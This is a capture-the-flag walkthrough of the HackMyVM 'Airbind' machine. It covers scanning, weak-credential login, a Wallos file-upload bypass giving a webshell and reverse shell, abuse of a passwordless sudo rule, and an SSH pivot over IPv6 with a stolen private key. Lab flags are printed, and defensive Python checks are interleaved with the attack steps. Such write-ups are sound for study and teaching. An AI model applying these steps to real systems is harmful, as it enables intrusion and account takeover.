HackMyVM-Airbind-Walkthrough
城南花已开 Lv6

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.183 08:00:27:a6:8e:72 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:ef:e0:77 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.031 seconds (126.05 hosts/sec). 4 responded
export ip=192.168.60.183
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.183:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-15 15:02 CST
Initiating ARP Ping Scan at 15:02
Scanning 192.168.60.183 [1 port]
Completed ARP Ping Scan at 15:02, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:02
Completed Parallel DNS resolution of 1 host. at 15:02, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:02
Scanning 192.168.60.183 [1 port]
Discovered open port 80/tcp on 192.168.60.183
Completed SYN Stealth Scan at 15:02, 0.04s elapsed (1 total ports)
Nmap scan report for 192.168.60.183
Host is up, received arp-response (0.0012s latency).
Scanned at 2025-05-15 15:02:13 CST for 0s

PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 63
MAC Address: 08:00:27:A6:8E:72 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
Raw packets sent: 2 (72B) | Rcvd: 5 (798B)

Port 22 is not open; only port 80 is.

Directory Enumeration

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.183
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/about.php (Status: 302) [Size: 0] [--> login.php]
/login.php (Status: 200) [Size: 1924]
/images (Status: 301) [Size: 317] [--> http://192.168.60.183/images/]
/index.php (Status: 302) [Size: 0] [--> login.php]
/logos.php (Status: 200) [Size: 1977]
/stats.php (Status: 302) [Size: 0] [--> login.php]
/screenshots (Status: 301) [Size: 322] [--> http://192.168.60.183/screenshots/]
/scripts (Status: 301) [Size: 318] [--> http://192.168.60.183/scripts/]
/registration.php (Status: 302) [Size: 0] [--> login.php]
/includes (Status: 301) [Size: 319] [--> http://192.168.60.183/includes/]
/db (Status: 301) [Size: 313] [--> http://192.168.60.183/db/]
/logout.php (Status: 302) [Size: 0] [--> .]
/styles (Status: 301) [Size: 317] [--> http://192.168.60.183/styles/]
/settings.php (Status: 302) [Size: 0] [--> login.php]
/auth.php (Status: 200) [Size: 0]
/libs (Status: 301) [Size: 315] [--> http://192.168.60.183/libs/]
Progress: 1102795 / 1102800 (100.00%)
===============================================================
Finished
===============================================================

PoC Exploitation

Opening the site in a browser shows a login form. Trying the weak credentials admin:admin logs us in.

The application identifies itself as Wallos v1.11.0.


A Google search for known vulnerabilities in this version

turns up a file upload vulnerability: "Wallos < 1.11.2 - File Upload RCE - PHP webapps Exploit".

A webshell can be uploaded through the "add subscription" feature.

Change the Content-Type to image/jpeg

and prepend GIF89a; to the file content.

Then request the PHP file under /images/uploads/logos/; the file is renamed automatically after upload.
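The bypass above works because the upload check only looks at what the client sends. As an added example (my code, not the post's or the Wallos project's; the weak check is an assumption modelled on the described bypass), here is that weak check beside a validator that ties the extension to an allowlist and to the matching magic bytes:

```python
import os
import secrets
from typing import Optional

# Magic bytes for the image types a logo upload endpoint should accept,
# keyed by the extension they belong to.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
ALL_SIGNATURES = tuple(sig for sigs in MAGIC.values() for sig in sigs)


def weak_check(content_type: str, data: bytes) -> bool:
    """Assumed weak check (not Wallos' real code): trust the client-sent
    Content-Type and any leading image signature. A 'GIF89a;<?php ...'
    body uploaded under a .php name passes."""
    return content_type.startswith("image/") and data.startswith(ALL_SIGNATURES)


def strict_check(filename: str, data: bytes) -> Optional[str]:
    """Return a server-chosen stored name, or None to reject.
    Content-Type is ignored entirely: it is client-controlled."""
    ext = os.path.splitext(filename)[1].lower()
    sigs = MAGIC.get(ext)
    if sigs is None:
        return None  # .php, .phtml and anything else off the allowlist
    if not data.startswith(sigs):
        return None  # bytes must match *this* extension, not just "some image"
    # Random name with the allowlisted extension: renaming alone did not help
    # in the post because the .php extension survived the rename.
    return secrets.token_hex(8) + ext


if __name__ == "__main__":
    polyglot = b"GIF89a;<?php /* attacker-supplied code */ ?>"
    print("weak check accepts polyglot:", weak_check("image/jpeg", polyglot))
    print("strict check stores polyglot as:", strict_check("shell.php", polyglot))
    print("strict check stores a gif as:", strict_check("logo.gif", b"GIF89a\x01\x00"))
```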

User Privilege Escalation

Start a listener

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.60.100
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from ubuntu-192.168.60.183-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/ubuntu~192.168.60.183_Linux_x86_64/2025_05_15-15_22_34-286.log 📜
───────────────────────────────────────────────────────────────────────────
www-data@ubuntu:/$

Local enumeration shows that the shell is running inside an LXC container.

www-data@ubuntu:/tmp$ hostname -I
10.0.3.241

The user also has sudo rights to run any command without a password.

www-data@ubuntu:/tmp$ sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User www-data may run the following commands on ubuntu:
(ALL) NOPASSWD: ALL
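A `(ALL) NOPASSWD: ALL` rule for the web server account is what turns a webshell into root inside the container. As an added check, not from the post, this script rates sudoers rules by how much they grant; the sample file and the service-account list are constructed:

```python
import re
from typing import List, Optional

# Accounts that should never hold a sudo rule at all (hypothetical list).
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "mysql", "postgres"}

# user  host=(runas) TAG: cmds  -- the classic sudoers user-spec shape
RULE = re.compile(
    r"^(?P<who>[^\s#]+)\s+(?P<hosts>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+?)\s*$"
)


def rate_rule(line: str) -> Optional[dict]:
    """Classify one sudoers line; None for comments, Defaults and non-rules."""
    line = line.strip()
    if not line or line.startswith(("#", "Defaults")):
        return None
    m = RULE.match(line)
    if not m:
        return None
    who, cmds = m["who"], m["cmds"]
    nopasswd = "NOPASSWD" in m["tags"].replace(":", " ").split()
    if cmds == "ALL" and nopasswd:
        severity = "critical"      # the rule found on this box
    elif cmds == "ALL" or who.lstrip("%") in SERVICE_ACCOUNTS:
        severity = "high"
    elif nopasswd:
        severity = "medium"
    else:
        severity = "info"
    return {"who": who, "runas": m["runas"] or who, "nopasswd": nopasswd,
            "cmds": cmds, "severity": severity}


def audit(sudoers_text: str) -> List[dict]:
    """Rate every rule in a sudoers file, keeping file order."""
    return [r for r in map(rate_rule, sudoers_text.splitlines()) if r]


# Constructed sample mirroring the rule behind the `sudo -l` output above.
SAMPLE = """\
Defaults env_reset, secure_path="/usr/sbin:/usr/bin:/sbin:/bin"
www-data ALL=(ALL) NOPASSWD: ALL
alice ALL=(ALL) ALL
%backup ALL=(root) NOPASSWD: /usr/bin/rsync
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding["severity"], finding)
```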

Switch to root and grab the user flag from root's home directory.

www-data@ubuntu:/tmp$ sudo su
root@ubuntu:/tmp# cd ~
root@ubuntu:~# ls -al
total 40
drwx------ 4 root root 4096 May 21 2024 .
drwxr-xr-x 17 root root 4096 May 15 06:52 ..
lrwxrwxrwx 1 root root 9 Apr 2 2024 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Oct 17 2022 .bashrc
-rw------- 1 root root 20 May 21 2024 .lesshst
drwxr-xr-x 3 root root 4096 Apr 1 2024 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-rw-r--r-- 1 root root 66 May 21 2024 .selected_editor
-rw------- 1 root root 300 May 21 2024 .sqlite_history
drwx------ 2 root root 4096 Apr 2 2024 .ssh
-rwx------ 1 root root 33 Apr 2 2024 user.txt
-rw------- 1 root root 0 May 21 2024 .wpa_cli_history
root@ubuntu:~# cat user.txt
4408f370877687429c6ab332e6f560d0

Root Privilege Escalation

Next, try to discover the host machine's IP and its open ports.

The target also has port 53 open.

root@ubuntu:/tmp# ./fscan -h 10.0.3.1/24  -p 0-65535

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 0-65535
[*] 开始信息扫描...
[*] CIDR范围: 10.0.3.0-10.0.3.255
[*] 已生成IP范围: 10.0.3.0 - 10.0.3.255
[*] 已解析CIDR 10.0.3.1/24 -> IP范围 10.0.3.0-10.0.3.255
[*] 最终有效主机数量: 256
[+] 目标 10.0.3.1 存活 (ICMP)
[+] 目标 10.0.3.241 存活 (ICMP)
[+] ICMP存活主机数量: 2
[!] 忽略无效端口: 0
[*] 共解析 65535 个有效端口
[+] 端口开放 10.0.3.241:80
[+] 端口开放 10.0.3.1:53
[+] 存活端口数量: 2
[*] 开始漏洞扫描...
[*] 网站标题 http://10.0.3.241 状态码:302 长度:0 标题:无标题 重定向地址: http://10.0.3.241/login.php
[*] 网站标题 http://10.0.3.241/login.php 状态码:200 长度:1924 标题:Wallos - Subscription Tracker
[!] 扫描错误 10.0.3.1:53 - Get "http://10.0.3.1:53": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[+] 扫描已完成: 2/2
[*] 扫描结束,耗时: 15.952480273s

There is also a .ssh directory in root's home containing a private key.

But the target does not expose port 22.

With no other way forward, try scanning over IPv6.

The target's IPv6 address turns out to be fe80::a00:27ff:fea6:8e72.

❯ ping6 -I eth0 -c 5 ff02::1
ping6: Warning: source address might be selected on device other than: eth0
PING ff02::1 (ff02::1) from :: eth0: 56 data bytes
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=1 ttl=64 time=0.028 ms
64 bytes from fe80::a00:27ff:fea6:8e72%eth0: icmp_seq=1 ttl=64 time=0.726 ms
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=2 ttl=64 time=0.027 ms
64 bytes from fe80::a00:27ff:fea6:8e72%eth0: icmp_seq=2 ttl=64 time=0.989 ms
^C
--- ff02::1 ping statistics ---
2 packets transmitted, 2 received, +2 duplicates, 0% packet loss, time 1040ms
rtt min/avg/max/mdev = 0.027/0.442/0.989/0.425 ms
❯ nmap -6 fe80::a00:27ff:fea6:8e72%eth0 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-15 16:07 CST
Nmap scan report for fe80::a00:27ff:fea6:8e72
Host is up (0.0018s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 08:00:27:A6:8E:72 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.53 seconds

Port 22 is open over IPv6, so try logging in with the private key found in the container.

I logged in directly from inside the container; seen from the container, the host's IPv6 address is fe80::216:3eff:fe00:0%eth0.

root@ubuntu:~# ping6 -I eth0 -c 5 ff02::1
ping6: Warning: source address might be selected on device other than: eth0
PING ff02::1(ff02::1) from :: eth0: 56 data bytes
64 bytes from fe80::dea1:f7ff:fe82:7613%eth0: icmp_seq=1 ttl=64 time=0.058 ms
64 bytes from fe80::216:3eff:fe00:0%eth0: icmp_seq=1 ttl=64 time=0.077 ms
64 bytes from fe80::dea1:f7ff:fe82:7613%eth0: icmp_seq=2 ttl=64 time=0.036 ms
64 bytes from fe80::216:3eff:fe00:0%eth0: icmp_seq=2 ttl=64 time=0.052 ms
^C
--- ff02::1 ping statistics ---
2 packets transmitted, 2 received, +2 duplicates, 0% packet loss, time 1028ms
rtt min/avg/max/mdev = 0.036/0.055/0.077/0.014 ms
root@ubuntu:~# ip a|grep inet6 |awk '{print $2}'
::1/128
fe80::dea1:f7ff:fe82:7613/64
root@ubuntu:~# ssh root@fe80::216:3eff:fe00:0%eth0
Linux airbind 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@airbind:~# cat root.txt
2bd693135712f88726c22770278a2dcf
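The IPv4 scan at the start showed only port 80 while sshd was reachable over IPv6 the whole time. As an added defensive check (not part of the post), this script parses `ss -Htln` output and reports listeners that an IPv4-only port scan cannot see; the sample output is constructed to resemble this host:

```python
import re
from typing import Dict, List, Set

# One `ss -Htln` line: State Recv-Q Send-Q Local-Address:Port Peer-Address:Port.
# Only the local column matters for this check.
LINE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+(?P<local>\S+)\s+\S+")

# Constructed sample: HTTP and DNS on IPv4, sshd bound to a link-local IPv6
# address only, plus a dual-stack wildcard socket for comparison.
SAMPLE_SS = """\
LISTEN 0 4096 0.0.0.0:80 0.0.0.0:*
LISTEN 0 4096 10.0.3.1:53 0.0.0.0:*
LISTEN 0 128 [fe80::216:3eff:fe00:0]%eth0:22 [::]:*
LISTEN 0 4096 [::]:443 [::]:*
"""


def parse_listeners(ss_output: str) -> Dict[int, Dict[str, Set[str]]]:
    """port -> {'v4': {addrs}, 'v6': {addrs}} for every listening TCP socket."""
    ports: Dict[int, Dict[str, Set[str]]] = {}
    for line in ss_output.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        addr, port = m["local"].rsplit(":", 1)   # '[::]:443' -> '[::]', '443'
        fam = "v6" if addr.startswith("[") else "v4"
        ports.setdefault(int(port), {"v4": set(), "v6": set()})[fam].add(addr)
    return ports


def ipv6_only_ports(ss_output: str, bindv6only: bool = False) -> List[int]:
    """Ports with no IPv4 listener. A wildcard [::] socket still serves IPv4
    unless net.ipv6.bindv6only=1, so it only counts when that sysctl is set."""
    hidden = []
    for port, fams in sorted(parse_listeners(ss_output).items()):
        if fams["v4"]:
            continue
        if "[::]" in fams["v6"] and not bindv6only:
            continue                      # dual-stack: an IPv4 scan sees it
        hidden.append(port)
    return hidden


if __name__ == "__main__":
    print("listeners invisible to an IPv4 scan:", ipv6_only_ports(SAMPLE_SS))
```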